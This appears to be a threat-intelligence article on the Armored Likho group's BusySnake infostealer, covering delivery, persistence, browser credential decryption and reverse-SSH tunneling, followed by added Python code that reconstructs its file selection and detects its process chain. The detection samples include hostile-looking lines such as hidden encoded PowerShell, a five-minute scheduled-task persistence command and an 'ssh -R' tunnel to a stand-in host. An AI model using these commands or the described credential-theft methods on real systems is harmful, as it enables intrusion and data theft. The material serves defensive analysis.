Confirmed victims span Russia, Kazakhstan and Brazil — and the attackers are deliberately striking government agencies and the electric power sector.
How Armored Likho gains initial access
The group Kaspersky researchers call Armored Likho relies primarily on spear-phishing. In recent campaigns the attackers distributed archive attachments with social-themed names such as 1bfb2e79-8084-429e-a35c-8b595ab9f839_psihologicheskiy_test.zip (a “psychological test”) and zayavka_gumanitarnayapomosch.rar (a “humanitarian aid application”). Archives contained either an EXE dropper or a malicious LNK shortcut.
The EXE variant is a self-extracting NSIS dropper (for example psihologicheskiy_test.exe). On execution it drops a legitimate-looking pnx.exe to %TEMP% and injects code into that process to run a malicious loader. The loader fetches archives from GitHub and stages components under %APPDATA%\WindowsHelper, including a Python 3.12 interpreter, get-pip.py, runtime components and the primary payload module.pyw. Persistence is established by creating VBScript files (wh_selfdelete.vbs to remove the initial loader and run.vbs to start module.pyw) and registering a scheduled task that runs the stealer every five minutes.
The LNK variant exploits the ZDI-CAN-25373 shortcut handling weakness to hide execution parameters. It launches an obfuscated PowerShell chain that downloads and runs the same style of loader, displays a decoy DOCX and then stages Python, pip and the BusySnake Stealer package in the same %APPDATA% directory.
BusySnake Stealer: architecture, obfuscation and behaviors
The core implant — dubbed BusySnake Stealer — is a previously undocumented, Python-based infostealer delivered as a .pyw (to avoid a console window). Its source is protected with PyArmor Pro version 9.2.0 so that bytecode is decrypted only at the moment a function is called and immediately re-encrypted. Kaspersky successfully stripped the protector and analyzed the functionality.
BusySnake organizes work into handlers (single_instance_lock, start_key_clipboard_logger, start_inventory_background, start_send_documents_priority_background, take_screenshot, poll_task and others). It enforces a single-instance lock with a lock file at Roaming\WindowsHelper\screenshots\.lock and logs clipboard contents continuously to a KEYLOG_FILE. The stealer inventories files into a sqlite database at Roaming\WindowsHelper\inventory_state.db, skips core system directories, ignores files larger than 16 MB, and extracts 64-character hex strings using a [0-9a-fA-F]{64} regular expression.
Files under Desktop, Documents and Downloads are targeted for prioritized exfiltration if they start with “$”, are not part of “System Volume Information”, are under 5 MB and have not been previously sent. The malware polls a C2 server (example host 159.198.41[.]140) for commands and reports task status back with JSON-like POST payloads.
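As an added example (not code from the Securelist report or from the malware itself), the Python below reconstructs the inventory and prioritization rules described above so an analyst can dry-run them against a host and see which files this stealer would have recorded and queued first. The sample file table is constructed for the example; the set of skipped system directories is an assumption, since the report does not list them.

```python
import os
import re
from dataclasses import dataclass

# Selection rules reconstructed from the behaviour described in the text.
HEX64 = re.compile(r"[0-9a-fA-F]{64}")      # inventory extracts 64-char hex strings
INVENTORY_MAX = 16 * 1024 * 1024             # inventory ignores files above 16 MB
PRIORITY_MAX = 5 * 1024 * 1024               # priority exfil requires files under 5 MB
PRIORITY_ROOTS = ("Desktop", "Documents", "Downloads")
# The report says "core system directories" are skipped without listing them;
# this set is an assumption made for the example.
SKIPPED_DIR_NAMES = {"windows", "program files", "program files (x86)", "programdata"}


@dataclass
class FileEntry:
    path: str
    size: int
    text: str = ""   # file contents as read, used only for the hex-string scan


def split_path(path: str) -> list:
    return [p for p in path.replace("/", "\\").split("\\") if p]


def is_skipped(path: str) -> bool:
    return any(p.lower() in SKIPPED_DIR_NAMES for p in split_path(path))


def inventory(files):
    """Files the inventory pass would record, mapped to the 64-hex strings found in them."""
    recorded = {}
    for f in files:
        if is_skipped(f.path) or f.size > INVENTORY_MAX:
            continue
        recorded[f.path] = HEX64.findall(f.text)
    return recorded


def priority_candidates(files, already_sent):
    """Files eligible for the prioritized send-documents handler."""
    chosen = []
    for f in files:
        parts = split_path(f.path)
        if not any(root in parts for root in PRIORITY_ROOTS):
            continue                              # not under Desktop/Documents/Downloads
        if not parts[-1].startswith("$"):
            continue                              # name must start with "$"
        if "System Volume Information" in parts:
            continue
        if f.size >= PRIORITY_MAX or f.path in already_sent:
            continue
        chosen.append(f.path)
    return chosen


def collect(root: str):
    """Build FileEntry records from a real directory tree for a dry run on a host."""
    entries = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            try:
                size = os.path.getsize(full)
                text = ""
                if size <= INVENTORY_MAX:
                    with open(full, "r", errors="ignore") as fh:
                        text = fh.read()
            except OSError:
                continue
            entries.append(FileEntry(full, size, text))
    return entries


# Constructed sample file table (not data from a real host).
SAMPLE_FILES = [
    FileEntry(r"C:\Users\alice\Documents\$budget.xlsx", 200 * 1024),
    FileEntry(r"C:\Users\alice\Desktop\$passwords.txt", 50 * 1024),
    FileEntry(r"C:\Users\alice\Desktop\notes.txt", 1024,
              "ledger key " + "0123456789abcdef" * 4 + " backup"),
    FileEntry(r"C:\Users\alice\Downloads\$wallet-backup.txt", 10 * 1024 * 1024),
    FileEntry(r"C:\Users\alice\Documents\System Volume Information\$tracking.log", 4096),
    FileEntry(r"C:\Windows\System32\kernel32.dll", 700 * 1024),
    FileEntry(r"C:\Users\alice\Videos\big.mp4", 20 * 1024 * 1024),
]
ALREADY_SENT = {r"C:\Users\alice\Desktop\$passwords.txt"}   # constructed "previously sent" state


def demo(files=SAMPLE_FILES, already_sent=ALREADY_SENT):
    return inventory(files), priority_candidates(files, already_sent)


if __name__ == "__main__":
    inv, pri = demo()
    for path, hexes in inv.items():
        print("inventoried:", path, "hex64 strings:", len(hexes))
    print("priority queue:", pri)
```

Run collect(os.path.expanduser("~")) on a suspect host and feed the result to inventory() and priority_candidates() to estimate what was exposed; the 64-hex hits are the strings the stealer would have pulled out regardless of file type.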
Credential theft, cookie exfiltration and extension-based harvesting
BusySnake implements multiple browser-theft routines. For Chromium-based browsers it reads the Local State file to obtain the DPAPI-wrapped master key and calls Windows DPAPI (win32crypt.CryptUnprotectData()) to unwrap it. With the master key it decrypts the saved login entries and writes chromium_passwords.json to Roaming\WindowsHelper.
Firefox extraction follows a parallel path: the implant checks Firefox profiles for logins.json and key4.db, parses encrypted entries into SECItem structures and relies on NSS_Init and PK11SDR_Decrypt to obtain plaintext credentials (saved to firefox_passwords.json) when a master password is not present. Cookie theft uses SQL queries against Cookies or cookies.sqlite and writes all_browser_data.json for exfiltration.
Separately, the stealer can download a protected supplementary module (from GitHub Releases) that builds a browser extension (manifest.json and sw.js), hosts a local web server, installs the extension, and directs cookie data to http://127.0.0.1:8000/?data_type=c for collection and subsequent exfiltration.
Reverse SSH tunneling, C2 updates and new task framework
BusySnake includes a built-in reverse-SSH tunnel capability similar to the previously observed Go2Tunnel tool. On a start-proxy command the implant contacts a control URL such as https://grked[.]online/tunnel/create/?username=[redacted] and receives a JSON response with socks_host, socks_port, an OpenSSH private key block and an ssh_command string. The malware launches the SSH command to establish a persistent reverse tunnel and removes the key and process on a stop-proxy command.
A newer BusySnake version introduces a task-management framework: commands and Python scripts are fetched from dashboard endpoints, tasks carry unique IDs and status values (SCHEDULED, IN_PROGRESS, SUCCEEDED, FAILED), and the implant can fetch Python scripts, pip-install dependencies, and execute code fully in memory without writing files to disk.
What this means for technologists, policymakers, and affected enterprises
- Technologists and security teams: expect multilayered staging (NSIS/PowerShell → Python interpreter → PyArmor-protected payload), in-memory script execution, scheduled-task persistence and reverse-SSH tunneling; detection should include LNK launch chains and scheduled-task creation patterns.
- Policymakers and regulators: the campaign’s focus on government agencies and the electric power sector — and confirmed victims in Russia, Kazakhstan and Brazil — signals cross-border operational reach and a mix of espionage and credential harvesting that may affect critical infrastructure reporting obligations.
- Affected enterprises (government and electric power): the attackers harvest clipboard, screenshots, browser credentials, cookies, OTP secrets and Telegram session data; prioritized review of scheduled tasks, unusual SSH processes and outbound connections to domains/IPs listed in the indicators is warranted.
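An added detection example (these are not Kaspersky's rules) covering the behaviours listed for security teams above: the LNK launch chain, the five-minute scheduled task, the Python interpreter staged under WindowsHelper, and the reverse SSH tunnel, run over constructed process-creation events. The task name, the interpreter layout under WindowsHelper, and the ssh command line are assumptions; the matchers are meant to be adapted to your own telemetry (Sysmon Event ID 1 or EDR process events).

```python
import re
from dataclasses import dataclass

WINDOWSHELPER = "\\appdata\\roaming\\windowshelper\\"   # staging directory from the report


@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


def _name(image: str) -> str:
    return image.rsplit("\\", 1)[-1].lower()


def rule_lnk_launch_chain(ev):
    """explorer.exe (the LNK host) spawning hidden or encoded PowerShell."""
    if _name(ev.image) != "powershell.exe" or _name(ev.parent_image) != "explorer.exe":
        return None
    cl = ev.command_line.lower()
    hidden = re.search(r"-w(indowstyle)?\s+hidden", cl)
    encoded = re.search(r"-e(c|nc|ncodedcommand)?\s+[a-z0-9+/=]{8,}", cl)
    return "lnk_launch_chain" if (hidden or encoded) else None


def rule_five_minute_task(ev):
    """schtasks creating a task that runs a script interpreter every five minutes.
    Tasks created through the COM API leave no schtasks.exe process; cover those with
    Security 4698 / TaskScheduler 106 events instead."""
    cl = ev.command_line.lower()
    if _name(ev.image) != "schtasks.exe" or "/create" not in cl:
        return None
    if (re.search(r"/sc\s+minute", cl) and re.search(r"/mo\s+5(\s|$)", cl)
            and re.search(r"\.vbs|\.pyw|wscript|pythonw?\.exe", cl)):
        return "five_minute_script_task"
    return None


def rule_python_from_windowshelper(ev):
    """A Python interpreter running from the staging directory, or executing a .pyw from it."""
    img, cl = ev.image.lower(), ev.command_line.lower()
    if WINDOWSHELPER in img or (_name(ev.image) in ("python.exe", "pythonw.exe") and WINDOWSHELPER in cl):
        return "python_from_windowshelper"
    return None


def rule_reverse_ssh_tunnel(ev):
    """ssh.exe with -R, launched by the implant or using a key from the staging directory."""
    if _name(ev.image) != "ssh.exe" or "-R" not in ev.command_line.split():
        return None
    if WINDOWSHELPER in ev.command_line.lower() or _name(ev.parent_image) in ("python.exe", "pythonw.exe"):
        return "reverse_ssh_tunnel"
    return None


RULES = (rule_lnk_launch_chain, rule_five_minute_task, rule_python_from_windowshelper, rule_reverse_ssh_tunnel)


def run_rules(events):
    """Return (rule_name, image_name) for every rule that fires on each event, in order."""
    hits = []
    for ev in events:
        for rule in RULES:
            name = rule(ev)
            if name:
                hits.append((name, _name(ev.image)))
    return hits


# Constructed events modelled on the chain in the report (paths, task name and ssh
# arguments are assumptions; the -enc payload is a placeholder, not real content).
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -w hidden -nop -ep bypass -enc AAAAAAAAAAAAAAAAAAAA"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\schtasks.exe",
              r'schtasks.exe /create /sc minute /mo 5 /tn "WindowsHelper" '
              r'/tr "wscript.exe C:\Users\alice\AppData\Roaming\WindowsHelper\run.vbs" /f'),
    ProcEvent(r"C:\Windows\System32\wscript.exe",
              r"C:\Users\alice\AppData\Roaming\WindowsHelper\pythonw.exe",
              r'pythonw.exe "C:\Users\alice\AppData\Roaming\WindowsHelper\module.pyw"'),
    ProcEvent(r"C:\Users\alice\AppData\Roaming\WindowsHelper\pythonw.exe",
              r"C:\Windows\System32\OpenSSH\ssh.exe",
              r"ssh.exe -i C:\Users\alice\AppData\Roaming\WindowsHelper\tunnel_key -N "
              r"-R 0.0.0.0:1080 tunnel@203.0.113.10 -p 22"),
    # benign controls: an admin script and a daily backup task
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -NoProfile -File C:\scripts\backup.ps1"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\schtasks.exe",
              r"schtasks.exe /create /sc daily /st 02:00 /tn Backup /tr C:\scripts\backup.ps1"),
]

if __name__ == "__main__":
    for rule, image in run_rules(SAMPLE_EVENTS):
        print(f"{rule:28s} {image}")
```

The four rules fire once each on the constructed chain and stay silent on the two benign events. The parent/child constraints are what keep the noise down: hidden PowerShell spawned by explorer.exe, and ssh -R spawned by a Python interpreter, are rare enough in most fleets to page on.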
Kaspersky reports that its Endpoint Detection and Response Expert product detects and blocks the LNK downloader and related chains using rules such as shell_creation_by_rundll32, windows_command_shell_usage and suspicious_powershell_cmd_or_script_spawning. Kaspersky also offers a Cloud Sandbox for deeper dynamic analysis and provides indicators of compromise and a reporting contact at intelreports@kaspersky.com.
Armored Likho’s BusySnake campaign combines AI-generated first-stage loaders, heavy PyArmor obfuscation, modular Python handlers and integrated reverse tunneling. The activity is ongoing, the toolkit is evolving, and defenders have concrete artifacts, IoCs and behavioral rules to act on now.
https://securelist.com/tr/armored-likho-apt-with-busysnake-stealer/120292/